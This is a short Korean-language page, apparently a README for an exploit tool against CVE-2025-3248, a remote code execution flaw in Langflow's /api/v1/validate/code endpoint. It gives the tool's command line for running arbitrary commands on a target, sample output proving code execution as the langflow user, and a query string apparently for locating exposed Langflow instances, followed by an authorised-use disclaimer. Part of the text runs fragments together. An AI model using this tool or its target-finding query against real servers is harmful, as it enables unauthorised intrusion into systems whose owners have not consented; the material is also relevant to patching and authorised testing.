
CVE-2025-3248 Langflow RCE 익스플로잇
CVE-2025-3248에 취약한 Langflow 애플리케이션을 위한 원격 코드 실행(RCE) 익스플로잇입니다.
영향을 받는 엔드포인트:
/api/v1/validate/code
python3 mitsec.py -u http://target:7860 -c "id"
[+] Command Output:
uid=1001(langflow) gid=1001(langflow) groups=1001(langflow)
exec()의 오용app="Langflow"
이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용됩니다. 무단 사용은 금지됩니다.